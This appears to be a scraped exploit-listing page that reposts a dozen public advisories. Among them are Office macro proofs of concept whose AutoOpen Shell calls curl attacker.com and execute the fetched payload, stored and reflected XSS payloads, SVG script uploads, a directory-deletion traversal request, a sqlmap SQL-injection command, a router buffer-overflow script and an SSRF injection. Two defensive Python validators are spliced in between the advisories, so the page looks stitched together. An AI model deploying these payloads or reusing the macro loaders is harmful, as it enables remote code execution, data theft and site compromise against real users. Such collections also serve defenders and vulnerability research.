All posts by ISHACK AI BOT
-
Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit - Remote Code Execution (RCE)
## Title: Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 04.17.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/microsoft-365/
## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/
## CVE-2023-28285

## Description:
The attack itself is carried out locally by a user with authentication to the targeted system. An attacker could exploit the vulnerability by convincing a victim, through social engineering, to download and open a specially crafted file from a website, which could lead to a local attack on the victim's computer. The attacker can trick the victim into opening a malicious web page by using a malicious `Word` file for the `Office-365 API`. After the user opens the file to read it, via the API of Office-365, without being asked what he wants to activate, etc., he activates the code of the malicious server, which is injected from that malicious server. Immediately after this click, the attacker can receive very sensitive information! Bank accounts, logs from sniffing attacks, tracking of all the victim's traffic without stopping, and more malicious stuff; it depends on the scenario, etc.

STATUS: HIGH Vulnerability

[+]Exploit:
The exploit server must be BROADCASTING at the moment when the victim hits the button of the exploit!

[+]PoC:
```vb
Sub AutoOpen()
Call Shell("cmd.exe /S /c" & "curl -s http://attacker.com/CVE-2023-28285/PoC.debelui | debelui", vbNormalFocus)
End Sub
```

## FYI:
The PoC has a price and this report will be uploaded with a description and video of how you can reproduce it only.

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28285)

## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/04/cve-2023-28285-microsoft-office-remote.html)

## Time spent: 01:30:00
-
WebsiteBaker v2.13.3 - Stored XSS
Exploit Title: WebsiteBaker v2.13.3 - Stored XSS
Application: WebsiteBaker
Version: 2.13.3
Bugs: Stored XSS
Technology: PHP
Vendor URL: https://websitebaker.org/pages/en/home.php
Software Link: https://wiki.websitebaker.org/doku.php/en/downloads
Date found: 26.06.2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================
Steps:
1. Log in to your account
2. Go to Media
3. Upload an SVG file
"""
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
"""
4. Go to the SVG file (http://localhost/media/malas.svg)
-
WebsiteBaker v2.13.3 - Directory Traversal
Exploit Title: WebsiteBaker v2.13.3 - Directory Traversal
Application: WebsiteBaker
Version: 2.13.3
Bugs: Directory Traversal
Technology: PHP
Vendor URL: https://websitebaker.org/pages/en/home.php
Software Link: https://wiki.websitebaker.org/doku.php/en/downloads
Date found: 26.06.2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
=======================================
Arbitrary directory deletion:

GET /admin/media/delete.php?dir=/../../../../../..//var/www&id=a838b6ebe8ba43a0 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/admin/media/browse.php?dir=/../../../../../..//var/www
Cookie: PHPSESSID-WB-6e6c39=bvnampsc5ji2drm439ph49143c; klaro=%7B%22klaro%22%3Atrue%2C%22mathCaptcha%22%3Atrue%7D
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
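The defensive counterpart to the request above, added here as an example and not taken from WebsiteBaker's code: the `dir` parameter is mapped onto the media tree lexically and rejected when the normalised result leaves it. The media root path is an assumption for the example.

```python
import posixpath
from typing import Optional

# Assumed media root for this example; the advisory does not state WebsiteBaker's real install path.
MEDIA_ROOT = "/var/www/html/wb/media"


def resolve_media_dir(dir_param: str, media_root: str = MEDIA_ROOT) -> Optional[str]:
    """Map a user-supplied ?dir= value onto the media tree; None means it escapes the tree.

    The check is lexical (posixpath.normpath), which is exactly what the advisory's payload
    needs: "..", "." and doubled "//" segments are collapsed before the prefix comparison.
    Symlinks planted inside the media tree would additionally need os.path.realpath.
    """
    if "\x00" in dir_param:
        return None  # NUL bytes truncate paths once they reach C-level filesystem calls
    root = posixpath.normpath(media_root)
    # Treat the parameter as relative to the media root even when it starts with "/"
    candidate = posixpath.normpath(posixpath.join(root, dir_param.lstrip("/")))
    # Accept the root itself or anything below it; the trailing "/" stops "media2" passing for "media"
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


def authorize_delete(dir_param: str, media_root: str = MEDIA_ROOT) -> bool:
    """Decision a hardened delete.php would take before touching the filesystem."""
    resolved = resolve_media_dir(dir_param, media_root)
    # Never delete the media root itself; only real sub-directories are legitimate targets
    return resolved is not None and resolved != posixpath.normpath(media_root)


if __name__ == "__main__":
    # The advisory's payload next to an ordinary sub-directory and two near-misses
    for value in ("/../../../../../..//var/www", "uploads/2023", "../media2", ""):
        print(repr(value), "->", resolve_media_dir(value), "| delete allowed:", authorize_delete(value))
```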
-
Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE)
## Title: Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 06.27.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/microsoft-365/excel
## Reference: https://portswigger.net/daily-swig/rce
## CVE-2023-33137

## Description:
This exploit is connected with a third-party exploit server, which waits for the victim to call it and execute the content from it using the pipe posting method! This is absolutely a 0-day exploit! This is absolutely dangerous for the victims who are infected by it! When the victim hits the button in the Excel file, it makes a POST request to the exploit server, and the server responds back this way: it creates another hidden malicious file and executes it directly on the machine of the victim, then everything disappears, so nasty.

STATUS: HIGH Vulnerability

WARNING: THIS IS VERY DANGEROUS for the usual users!

[+]Exploit:
```vbs
Sub AutoOpen()
Call Shell("cmd.exe /S /c" & "curl -s https://attacker.com/nu11secur1ty/somwhere/ontheinternet/maloumnici.bat > maloumnici.bat && .\maloumnici.bat", vbNormalFocus)
End Sub
```

## Reproduce:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33137)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/microsoft-excel-microsoft-365-mso.html)

## Time spent: 01:27:00
-
D-Link DAP-1325 - Broken Access Control
# Exploit Title: D-Link DAP-1325 - Broken Access Control
# Date: 27-06-2023
# Exploit Author: ieduardogoncalves
# Contact : twitter.com/0x00dia
# Vendor : www.dlink.com
# Version: Hardware version: A1
# Firmware version: 1.01
# Tested on: All Platforms

1) Description
Security vulnerability known as "Unauthenticated access to settings" or "Unauthenticated configuration download". This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication.

IN MY CASE, tested repeater IP: http://192.168.0.21/
Video POC : https://www.dropbox.com/s/eqz0ntlzqp5472l/DAP-1325.mp4?dl=0

2) Proof of Concept
Step 1: Go to the Repeater Login Page : http://192.168.0.21/
Step 2: Add the payload to the URL.
Payload: http://{ip}/cgi-bin/ExportSettings.sh
Payload: https://github.com/eeduardogoncalves/exploit
-
spip v4.1.10 - Spoofing Admin account
## Exploit Title: spip v4.1.10 - Spoofing Admin account
## Author: nu11secur1ty
## Date: 06.29.2023
## Vendor: https://www.spip.net/en_rubrique25.html
## Software: https://files.spip.net/spip/archives/spip-v4.1.10.zip
## Reference: https://www.crowdstrike.com/cybersecurity-101/spoofing-attacks/

## Description:
The malicious user can upload a malicious SVG file, which is not filtered by a security function, and he can trick the administrator of this system to check his logo by clicking on it and visiting, maybe, a very dangerous URL. Wrong web app website logic, and a not well sanitizing upload function.

STATUS: HIGH Vulnerability

[+]Exploit:
```svg
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<defs>
<linearGradient id="badgeGradient">
<stop offset="0"/>
<stop offset="1"/>
</linearGradient>
</defs>
<g id="heading">
<a xlink:href= "https://rb.gy/74f0y">
<path id="badge" d="M 29.6,22.8 C 29.2,23.4 24.3,22.4 23.8,22.9 C 23.4,23.3 24.3,28.3 23.8,28.6 C 23.2,28.9 19.4,25.6 18.8,25.8 C 18.2,26.0 16.5,30.7 15.8,30.7 C 15.2,30.7 13.5,26.0 12.9,25.8 C 12.3,25.6 8.5,28.9 7.9,28.6 C 7.4,28.3 8.3,23.3 7.9,22.9 C 7.4,22.4 2.4,23.4 2.1,22.8 C 1.8,22.3 5.1,18.4 4.9,17.8 C 4.8,17.2 0.0,15.5 0.0,14.9 C 0.0,14.3 4.8,12.6 4.9,12.0 C 5.1,11.4 1.8,7.5 2.1,7.0 C 2.4,6.4 7.4,7.3 7.9,6.9 C 8.3,6.5 7.4,1.5 7.9,1.2 C 8.5,0.9 12.3,4.1 12.9,4.0 C 13.5,3.8 15.2,-0.8 15.8,-0.8 C 16.5,-0.8 18.2,3.8 18.8,4.0 C 19.4,4.1 23.2,0.9 23.8,1.2 C 24.3,1.5 23.4,6.5 23.8,6.9 C 24.3,7.3 29.2,6.4 29.6,7.0 C 29.9,7.5 26.6,11.4 26.8,12.0 C 26.9,12.6 31.7,14.3 31.7,14.9 C 31.7,15.5 26.9,17.2 26.8,17.8 C 26.6,18.4 29.9,22.3 29.6,22.8 z"/>
<!--<text id="label" x="5" y="20" transform = "rotate(-15 10 10)">New</text>-->
<text id="title" x="40" y="20">Please click on the logo, to see our design services, on our website, thank you!</text>
</a>
</g>
</svg>
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/SPIP/SPIP-4.1.10)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/spip-v4110-spoofing-admin-account.html)

## Time spent: 00:37:00
-
Time Slot Booking Calendar 1.8 - Stored Cross-Site Scripting (XSS)
# Exploit Title: Time Slot Booking Calendar 1.8 - Stored XSS
# Date: 29/06/2023
# Exploit Author: CraCkEr
# Vendor: GZ Scripts
# Vendor Homepage: https://gzscripts.com/
# Software Link: https://gzscripts.com/time-slot-booking-calendar-php.html
# Version: 1.8
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site

## Release Notes:
Allows an attacker to inject malicious code into the website, giving the ability to steal sensitive information, manipulate data, and launch additional attacks.

## Stored XSS
-----------------------------------------------
POST /TimeSlotBookingCalendarPHP/load.php?controller=GzFront&action=booking_details&cid=1 HTTP/1.1

promo_code=&title=prof&male=female&first_name=[XSS Payload]&second_name=[XSS Payload]&phone=[XSS Payload]&email=cracker%40infosec.com&company=&address_1=[XSS Payload]&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload]&additional=xxx&captcha=rtznqs&terms=1&cal_id=1&calendar_id=1
-----------------------------------------------
POST parameter 'first_name' is vulnerable to XSS
POST parameter 'second_name' is vulnerable to XSS
POST parameter 'phone' is vulnerable to XSS
POST parameter 'address_1' is vulnerable to XSS
POST parameter 'country' is vulnerable to XSS

## Steps to Reproduce:
1. As a [Guest User], choose any day colored green on the calendar - click on [+] near Start/End Time - press [Booking]
2. Inject your [XSS Payload] in "First Name"
3. Inject your [XSS Payload] in "Last Name"
4. Inject your [XSS Payload] in "Phone"
5. Inject your [XSS Payload] in "Address Line 1"
6. Inject your [XSS Payload] in "Country"
7. Accept the terms & press [Booking]
   XSS fired in the local user's browser
8. When ADMIN visits [Dashboard] in the Administration Panel on this path (https://website/index.php?controller=GzAdmin&action=dashboard), the XSS will fire and execute in his browser
9. When ADMIN visits [Bookings] - [All Booking] to check [Pending Booking] on this path (https://website/index.php?controller=GzBooking&action=index), the XSS will fire and execute in his browser
10. When ADMIN visits [Invoices] - [All Invoices] to check [Pending Invoices] on this path (https://website/index.php?controller=GzInvoice&action=index), the XSS will fire and execute in his browser

[-] Done
-
GZ Forum Script 1.8 - Stored Cross-Site Scripting (XSS)
# Exploit Title: GZ Forum Script 1.8 - Stored Cross-Site Scripting (XSS)
# Date: 30/06/2023
# Exploit Author: CraCkEr
# Vendor: GZ Scripts
# Vendor Homepage: https://gzscripts.com/
# Software Link: https://gzscripts.com/gz-forum-script.html
# Version: 1.8
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site

## Release Notes:
Reflected XSS: The attacker can send the victim a link containing a malicious URL in an email or instant message and can perform a wide variety of actions, such as stealing the victim's session token or login credentials.
Stored XSS: Allows an attacker to inject malicious code into the website, giving the ability to steal sensitive information, manipulate data, and launch additional attacks.

## Reflected XSS
Path: /preview.php
GET 'catid' parameter is vulnerable to RXSS
http://www.website/preview.php?controller=Load&action=index&catid=moztj%22%3e%3cscript%3ealert(1)%3c%2fscript%3ems3ea&down_up=a

Path: /preview.php
GET 'topicid' parameter is vulnerable to RXSS
http://www.website/preview.php?controller=Load&action=topic&topicid=1wgaff%22%3e%3cscript%3ealert(1)%3c%2fscript%3exdhk2

## Stored XSS
-----------------------------------------------
POST /GZForumScript/preview.php?controller=Load&action=start_new_topic HTTP/1.1

-----------------------------39829578812616571248381709325
Content-Disposition: form-data; name="free_name"

<script>alert(1)</script>
-----------------------------39829578812616571248381709325
Content-Disposition: form-data; name="topic"

<script>alert(1)</script>
-----------------------------39829578812616571248381709325
Content-Disposition: form-data; name="topic_message"

<script>alert(1)</script>
-----------------------------39829578812616571248381709325--
-----------------------------------------------
POST parameter 'free_name' is vulnerable to XSS
POST parameter 'topic' is vulnerable to XSS
POST parameter 'topic_message' is vulnerable to XSS

## Steps to Reproduce:
1. As a [Guest User], click on [New Topic] to create a "New Topic" on this path (http://website/preview.php?controller=Load&action=start_new_topic)
2. Inject your [XSS Payload] in "Name"
3. Inject your [XSS Payload] in "Topic Title"
4. Inject your [XSS Payload] in "Topic Message"
5. Submit
6. XSS fires in visitors' browsers when they visit the topic you infected with your [XSS Payload]
7. XSS fires in ADMIN's browser when he visits [Dashboard] in the Administration Panel on this path (https://website/GzAdmin/dashboard)
8. XSS fires in ADMIN's browser when he visits [Topic] & [All Topics] to check [New Topics] on this path (https://website/GzTopic/index)
-
WP AutoComplete 1.0.4 - Unauthenticated SQLi
# Exploit Title: WP AutoComplete 1.0.4 - Unauthenticated SQLi
# Date: 30/06/2023
# Exploit Author: Matin nouriyan (matitanium)
# Version: <= 1.0.4
# CVE: CVE-2022-4297
# Vendor Homepage: https://wordpress.org/support/plugin/wp-autosearch/
# Tested on: Kali linux

---------------------------------------
The WP AutoComplete Search WordPress plugin through 1.0.4 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection.
--------------------------------------

How to Reproduce this Vulnerability:
1. Install WP AutoComplete <= 1.0.4
2. WP AutoComplete <= 1.0.4 uses the q parameter for AJAX requests
3. Find requests belonging to WP AutoComplete like the one in step 5
4. Start sqlmap and exploit
5. python3 sqlmap.py -u "https://example.com/wp-admin/admin-ajax.php?q=[YourSearch]&Limit=1000&timestamp=1645253464&action=wi_get_search_results&security=[xxxx]" --random-agent --level=5 --risk=2 -p q
-
TP-Link TL-WR940N V4 - Buffer OverFlow
# Exploit Title: TP-Link TL-WR940N V4 - Buffer OverFlow
# Date: 2023-06-30
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : hardware
# Dork : /userRpm/WanDynamicIpV6CfgRpm
# Tested on: Windows/Linux
# CVE : CVE-2023-36355

import requests

# Replace the IP address with the router's IP
router_ip = '192.168.0.1'

# Construct the URL with the vulnerable endpoint and parameter
url = f'http://{router_ip}/userRpm/WanDynamicIpV6CfgRpm?ipStart='

# Replace the payload with a crafted payload that triggers the buffer overflow
payload = 'A' * 5000  # Example payload, adjust the length as needed

# Send the GET request with the crafted payload
response = requests.get(url + payload)

# Check the response status code
if response.status_code == 200:
    print('Buffer overflow triggered successfully')
else:
    print('Buffer overflow not triggered')
-
Vacation Rental 1.8 - Stored Cross-Site Scripting (XSS)
# Exploit Title: Vacation Rental 1.8 - Stored Cross-Site Scripting (XSS)
# Date: 30/06/2023
# Exploit Author: CraCkEr
# Vendor: GZ Scripts
# Vendor Homepage: https://gzscripts.com/
# Software Link: https://gzscripts.com/vacation-rental-website.html
# Version: 1.8
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site

## Stored XSS
------------------------------------------------------------
POST /VacationRentalWebsite/property/8/ad-has-principes/ HTTP/1.1

property_id=8&action=detail&send_review=1&cleanliness=0%3B4.2&comfort=0%3B4.2&location=0%3B4.2&service=0%3B4.2&sleep=0%3B4.2&price=0%3B4.2&username=[XSS Payload]&evaluation=3&title=[XSS Payload]&comment=[XSS Payload]&captcha=lbhkyj
------------------------------------------------------------
POST parameter 'username' is vulnerable to XSS
POST parameter 'title' is vulnerable to XSS
POST parameter 'comment' is vulnerable to XSS

## Steps to Reproduce:
1. Surf (as Guest) - go to any listed property
2. Go to [Customer Reviews] on this path (http://website/property/[Number1-9]/[name-of-Property]/#customerReviews)
3. Inject your [XSS Payload] in "Username"
4. Inject your [XSS Payload] in "Title"
5. Inject your [XSS Payload] in "Comment"
6. Submit
7. XSS fired in the local browser
8. XSS will fire & execute in visitors' browsers when they visit the page of the property you [injected] the XSS payloads in, & XSS will also fire on the [Reviews Page]

Note: I think the Administration Panel is missing a section to manage [Reviews] on the website; this feature must be added in the next updates [View/Edit/Delete]
-
Prestashop 8.0.4 - Cross-Site Scripting (XSS)
Exploit Title: Prestashop 8.0.4 - Cross-Site Scripting (XSS)
Application: prestashop
Version: 8.0.4
Bugs: Stored XSS
Technology: PHP
Vendor URL: https://prestashop.com/
Software Link: https://prestashop.com/prestashop-edition-basic/
Date found: 30.06.2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================
Steps:
1. Go to Catalog => Products
2. Select an arbitrary product
3. Upload a malicious SVG file

SVG file content ===>
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>

PoC request:
POST /admin253irhit4jjbd9gurze/filemanager/upload.php HTTP/1.1
Host: localhost
Content-Length: 756
sec-ch-ua: 
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
Accept: application/json
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/admin253irhit4jjbd9gurze/filemanager/dialog.php?type=1&descending=false&sort_by=&lang=en
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=jcsq33e9kk7sk5m3bssjvhhggt; PrestaShop-c1c78947c88162eb206771df4a41c662=[...]; PrestaShop-8edfcba6bf6b77ff3bb3d94e0228b048=[...]
Connection: close

------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
Content-Disposition: form-data; name="path"


------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
Content-Disposition: form-data; name="path_thumb"


------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
Content-Disposition: form-data; name="file"; filename="malas.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ--
-
Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting (XSS)
# Exploit Title: Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting (XSS)
# Date: 1/07/2023
# Exploit Author: tmrswrr
# Vendor Homepage: http://www.opencms.org
# Software Link: https://github.com/alkacon/opencms-core
# Version: v15.0

POC:
1 ) Log in on the demo page, go to this URL
https://demo.opencms.org/workplace#!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/.galleries/livedemo/!!
2 ) Click /.galleries/, then right-click any png file, open the gallery, and write this payload in the search box:
<img src=. onerror=alert(document.domain)>
3 ) You will see an alert box

POC:
1 ) Go to this URL, right-click any png file, rename the title section and write your payload:
<img src=. onerror=alert(document.domain)>
https://demo.opencms.org/workplace#!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/230701/ld_go87op3bfy/.galleries/images/!!
2 ) You will see an alert box, stored XSS

POC:
1 ) Go to this URL, right-click any png file and choose replace, click change file and choose your SVG file, then save it
SVG file:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS");
</script>
</svg>
2 ) When you click this SVG file you will see an alert box
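The same SVG upload weakness appears in the WebsiteBaker, SPIP, Prestashop and OpenCMS posts above. As an added defensive example, not code from any of those projects, this is an upload-side validator that parses the file and flags script elements, event-handler attributes, `javascript:`/`data:` hrefs and off-site links of the kind the SPIP logo used. The sample files and their hosts are constructed for the example.

```python
import xml.etree.ElementTree as ET
from typing import List

# Elements that run script or embed foreign content. <a> is judged by its href instead.
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object", "handler", "set", "animate"}


def _local_name(qname: str) -> str:
    """'{http://www.w3.org/2000/svg}script' -> 'script' (namespace stripped, lower-cased)."""
    return qname.rsplit("}", 1)[-1].lower()


def svg_findings(svg_bytes: bytes) -> List[str]:
    """Return the reasons an uploaded SVG should be rejected; an empty list means it looks clean.

    Inspection runs on the parsed tree, i.e. after entity expansion, so an href written as
    "&#106;avascript:..." arrives here as "javascript:...". Stdlib expat does not fetch the
    external DTD referenced by the advisories' files, but it does expand internal entities,
    so a production gateway should parse with defusedxml instead.
    """
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings: List[str] = []
    if _local_name(root.tag) != "svg":
        findings.append(f"root element is <{_local_name(root.tag)}>, not <svg>")
    for element in root.iter():
        name = _local_name(element.tag)
        if name in ACTIVE_ELEMENTS:
            findings.append(f"active element <{name}>")
        if name == "style" and element.text and "url(" in element.text.lower():
            findings.append("<style> block loads an external resource")
        for attr, raw in element.attrib.items():
            aname = _local_name(attr)
            value = raw.strip().lower()
            if aname.startswith("on"):
                findings.append(f"event handler {aname} on <{name}>")
            elif aname == "href":  # matches both SVG 2 href and xlink:href
                if value.startswith(("javascript:", "vbscript:", "data:")):
                    findings.append(f"script or data URI in href on <{name}>")
                elif "://" in value or value.startswith("//"):
                    findings.append(f"external link in href on <{name}>: {raw}")
            elif aname == "style" and ("url(" in value or "expression(" in value):
                findings.append(f"style attribute loads an external resource on <{name}>")
    return findings


def is_safe_svg(svg_bytes: bytes) -> bool:
    """Accept/reject decision for an upload handler. Pair it with Content-Disposition: attachment
    or a separate media origin so that a missed case still cannot run in the site's origin."""
    return not svg_findings(svg_bytes)


# Constructed samples: the script payload shared by the advisories above, a SPIP-style
# clickable logo pointing off-site (placeholder host), and a clean icon.
SCRIPT_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">alert(document.location);</script>
</svg>"""

ANCHOR_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
  <a xlink:href="https://offsite.example/landing">
    <text x="40" y="20">Please click on the logo to see our design services</text>
  </a>
</svg>"""

CLEAN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 50 50">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
</svg>"""

if __name__ == "__main__":
    for label, sample in (("script", SCRIPT_SVG), ("anchor", ANCHOR_SVG), ("clean", CLEAN_SVG)):
        print(label, "safe" if is_safe_svg(sample) else "rejected", svg_findings(sample))
```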
-
PodcastGenerator 3.2.9 - Blind SSRF via XML Injection
# Exploit Title: PodcastGenerator 3.2.9 - Blind SSRF via XML Injection
# Application: PodcastGenerator
# Version: v3.2.9
# Bugs: Blind SSRF via XML Injection
# Technology: PHP
# Vendor URL: https://podcastgenerator.net/
# Software Link: https://github.com/PodcastGenerator/PodcastGenerator
# Date found: 01-07-2023
# Author: Mirabbas Ağalarov
# Tested on: Linux

2. Technical Details & POC
========================================
Steps:
1. Go to 'Upload New Episodes' (http://localhost/PodcastGenerator/admin/episodes_upload.php)
2. Fill in all sections and set the Short Description section to
   'test]]></shortdescPG><imgPG path="">http://localhost:3132</imgPG><shortdescPG><![CDATA[test'
   (http://localhost:3132 is where the attacker's domain goes)

   payload: test]]></shortdescPG><imgPG path="">http://localhost:3132</imgPG><shortdescPG><![CDATA[test

   By the way, I used localhost. If you have a domain, you can use the domain.
3. Upload the episode
4. I am listening on port 3132 because I'm observing for incoming requests:
   nc -lvp 3132
5. And I receive the request

Request:
POST /PodcastGenerator/admin/episodes_upload.php HTTP/1.1
Host: localhost
Content-Length: 101563
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypRUTcUa48pmEcI6Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/PodcastGenerator/admin/episodes_upload.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=rsvvc28on2q91ael2fiou3nad3
Connection: close

------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="file"; filename="2023-07-01_2023-07-01_2023-07-01_4_photo-1575936123452-b67c3203c357_1_ (2).jpeg"
Content-Type: image/jpeg

image content blaaahblahasdfjblaaah;sdfblaaahasdf asdfasdfadddblaaahdblaaahddddblaaahddddddblaaahblaaahblaaahdddblaaahddddblaaahdblaaahddblaaahdddddblaaahddddddddddd
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="title"

test
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="shortdesc"

test]]></shortdescPG><imgPG path="">http://localhost:3132</imgPG><shortdescPG><![CDATA[test
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="date"

2023-07-01
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="time"

17:02
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="episodecover"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="longdesc"

test
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="episodenum"

33
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="seasonnum"

33
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="itunesKeywords"


------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="explicit"

no
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="authorname"


------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="authoremail"


------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="customtags"


------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="token"

vdzM0jc75uLMHV7ovxew8Dawh5mnWSpz
------WebKitFormBoundarypRUTcUa48pmEcI6Q--
-
WBCE CMS 1.6.1 - Open Redirect & CSRF
